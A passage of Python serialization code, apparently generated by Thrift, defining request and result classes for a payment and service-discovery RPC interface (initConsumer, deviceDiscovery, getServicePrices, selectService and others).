def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('removeService_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class initConsumer_args(object):
"""
Attributes:
- scheme
- hostname
- port
- urlPrefix
- clientID
- hceCard
- pspConfig
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'scheme', 'UTF8', None, ), # 1
(2, TType.STRING, 'hostname', 'UTF8', None, ), # 2
(3, TType.I32, 'port', None, None, ), # 3
(4, TType.STRING, 'urlPrefix', 'UTF8', None, ), # 4
(5, TType.STRING, 'clientID', 'UTF8', None, ), # 5
(6, TType.STRUCT, 'hceCard', (wpthrift_types.ttypes.HCECard, wpthrift_types.ttypes.HCECard.thrift_spec), None, ), # 6
(7, TType.MAP, 'pspConfig', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 7
)
def __init__(self, scheme=None, hostname=None, port=None, urlPrefix=None, clientID=None, hceCard=None, pspConfig=None,):
self.scheme = scheme
self.hostname = hostname
self.port = port
self.urlPrefix = urlPrefix
self.clientID = clientID
self.hceCard = hceCard
self.pspConfig = pspConfig
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.scheme = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.hostname = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.port = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.urlPrefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.clientID = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.hceCard = wpthrift_types.ttypes.HCECard()
self.hceCard.read(iprot)
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.MAP:
self.pspConfig = {}
(_ktype1, _vtype2, _size0) = iprot.readMapBegin()
for _i4 in range(_size0):
_key5 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val6 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.pspConfig[_key5] = _val6
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('initConsumer_args')
if self.scheme is not None:
oprot.writeFieldBegin('scheme', TType.STRING, 1)
oprot.writeString(self.scheme.encode('utf-8') if sys.version_info[0] == 2 else self.scheme)
oprot.writeFieldEnd()
if self.hostname is not None:
oprot.writeFieldBegin('hostname', TType.STRING, 2)
oprot.writeString(self.hostname.encode('utf-8') if sys.version_info[0] == 2 else self.hostname)
oprot.writeFieldEnd()
if self.port is not None:
oprot.writeFieldBegin('port', TType.I32, 3)
oprot.writeI32(self.port)
oprot.writeFieldEnd()
if self.urlPrefix is not None:
oprot.writeFieldBegin('urlPrefix', TType.STRING, 4)
oprot.writeString(self.urlPrefix.encode('utf-8') if sys.version_info[0] == 2 else self.urlPrefix)
oprot.writeFieldEnd()
if self.clientID is not None:
oprot.writeFieldBegin('clientID', TType.STRING, 5)
oprot.writeString(self.clientID.encode('utf-8') if sys.version_info[0] == 2 else self.clientID)
oprot.writeFieldEnd()
if self.hceCard is not None:
oprot.writeFieldBegin('hceCard', TType.STRUCT, 6)
self.hceCard.write(oprot)
oprot.writeFieldEnd()
if self.pspConfig is not None:
oprot.writeFieldBegin('pspConfig', TType.MAP, 7)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.pspConfig))
for kiter7, viter8 in self.pspConfig.items():
oprot.writeString(kiter7.encode('utf-8') if sys.version_info[0] == 2 else kiter7)
oprot.writeString(viter8.encode('utf-8') if sys.version_info[0] == 2 else viter8)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class initConsumer_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('initConsumer_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class initProducer_args(object):
"""
Attributes:
- pspConfig
"""
thrift_spec = (
None, # 0
(1, TType.MAP, 'pspConfig', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 1
)
def __init__(self, pspConfig=None,):
self.pspConfig = pspConfig
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.pspConfig = {}
(_ktype10, _vtype11, _size9) = iprot.readMapBegin()
for _i13 in range(_size9):
_key14 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val15 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.pspConfig[_key14] = _val15
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('initProducer_args')
if self.pspConfig is not None:
oprot.writeFieldBegin('pspConfig', TType.MAP, 1)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.pspConfig))
for kiter16, viter17 in self.pspConfig.items():
oprot.writeString(kiter16.encode('utf-8') if sys.version_info[0] == 2 else kiter16)
oprot.writeString(viter17.encode('utf-8') if sys.version_info[0] == 2 else viter17)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class initProducer_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('initProducer_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getDevice_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getDevice_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getDevice_result(object):
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.Device, wpthrift_types.ttypes.Device.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.Device()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getDevice_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class startServiceBroadcast_args(object):
"""
Attributes:
- timeoutMillis
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'timeoutMillis', None, None, ), # 1
)
def __init__(self, timeoutMillis=None,):
self.timeoutMillis = timeoutMillis
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.timeoutMillis = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('startServiceBroadcast_args')
if self.timeoutMillis is not None:
oprot.writeFieldBegin('timeoutMillis', TType.I32, 1)
oprot.writeI32(self.timeoutMillis)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class startServiceBroadcast_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('startServiceBroadcast_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class stopServiceBroadcast_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('stopServiceBroadcast_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class stopServiceBroadcast_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('stopServiceBroadcast_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deviceDiscovery_args(object):
"""
Attributes:
- timeoutMillis
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'timeoutMillis', None, None, ), # 1
)
def __init__(self, timeoutMillis=None,):
self.timeoutMillis = timeoutMillis
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.timeoutMillis = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deviceDiscovery_args')
if self.timeoutMillis is not None:
oprot.writeFieldBegin('timeoutMillis', TType.I32, 1)
oprot.writeI32(self.timeoutMillis)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deviceDiscovery_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.SET, 'success', (TType.STRUCT, (wpthrift_types.ttypes.ServiceMessage, wpthrift_types.ttypes.ServiceMessage.thrift_spec), False), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.SET:
self.success = set()
(_etype21, _size18) = iprot.readSetBegin()
for _i22 in range(_size18):
_elem23 = wpthrift_types.ttypes.ServiceMessage()
_elem23.read(iprot)
self.success.add(_elem23)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deviceDiscovery_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.SET, 0)
oprot.writeSetBegin(TType.STRUCT, len(self.success))
for iter24 in self.success:
iter24.write(oprot)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class requestServices_args(object):
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('requestServices_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class requestServices_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.SET, 'success', (TType.STRUCT, (wpthrift_types.ttypes.ServiceDetails, wpthrift_types.ttypes.ServiceDetails.thrift_spec), False), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.SET:
self.success = set()
(_etype28, _size25) = iprot.readSetBegin()
for _i29 in range(_size25):
_elem30 = wpthrift_types.ttypes.ServiceDetails()
_elem30.read(iprot)
self.success.add(_elem30)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('requestServices_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.SET, 0)
oprot.writeSetBegin(TType.STRUCT, len(self.success))
for iter31 in self.success:
iter31.write(oprot)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getServicePrices_args(object):
"""
Attributes:
- serviceId
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'serviceId', None, None, ), # 1
)
def __init__(self, serviceId=None,):
self.serviceId = serviceId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.serviceId = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getServicePrices_args')
if self.serviceId is not None:
oprot.writeFieldBegin('serviceId', TType.I32, 1)
oprot.writeI32(self.serviceId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getServicePrices_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.SET, 'success', (TType.STRUCT, (wpthrift_types.ttypes.Price, wpthrift_types.ttypes.Price.thrift_spec), False), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.SET:
self.success = set()
(_etype35, _size32) = iprot.readSetBegin()
for _i36 in range(_size32):
_elem37 = wpthrift_types.ttypes.Price()
_elem37.read(iprot)
self.success.add(_elem37)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getServicePrices_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.SET, 0)
oprot.writeSetBegin(TType.STRUCT, len(self.success))
for iter38 in self.success:
iter38.write(oprot)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class selectService_args(object):
"""
Attributes:
- serviceId
- numberOfUnits
- priceId
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'serviceId', None, None, ), # 1
(2, TType.I32, 'numberOfUnits', None, None, ), # 2
(3, TType.I32, 'priceId', None, None, ), # 3
)
def __init__(self, serviceId=None, numberOfUnits=None, priceId=None,):
self.serviceId = serviceId
self.numberOfUnits = numberOfUnits
self.priceId = priceId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.serviceId = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.numberOfUnits = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.priceId = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('selectService_args')
if self.serviceId is not None:
oprot.writeFieldBegin('serviceId', TType.I32, 1)
oprot.writeI32(self.serviceId)
oprot.writeFieldEnd()
if self.numberOfUnits is not None:
oprot.writeFieldBegin('numberOfUnits', TType.I32, 2)
oprot.writeI32(self.numberOfUnits)
oprot.writeFieldEnd()
if self.priceId is not None:
oprot.writeFieldBegin('priceId', TType.I32, 3)
oprot.writeI32(self.priceId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
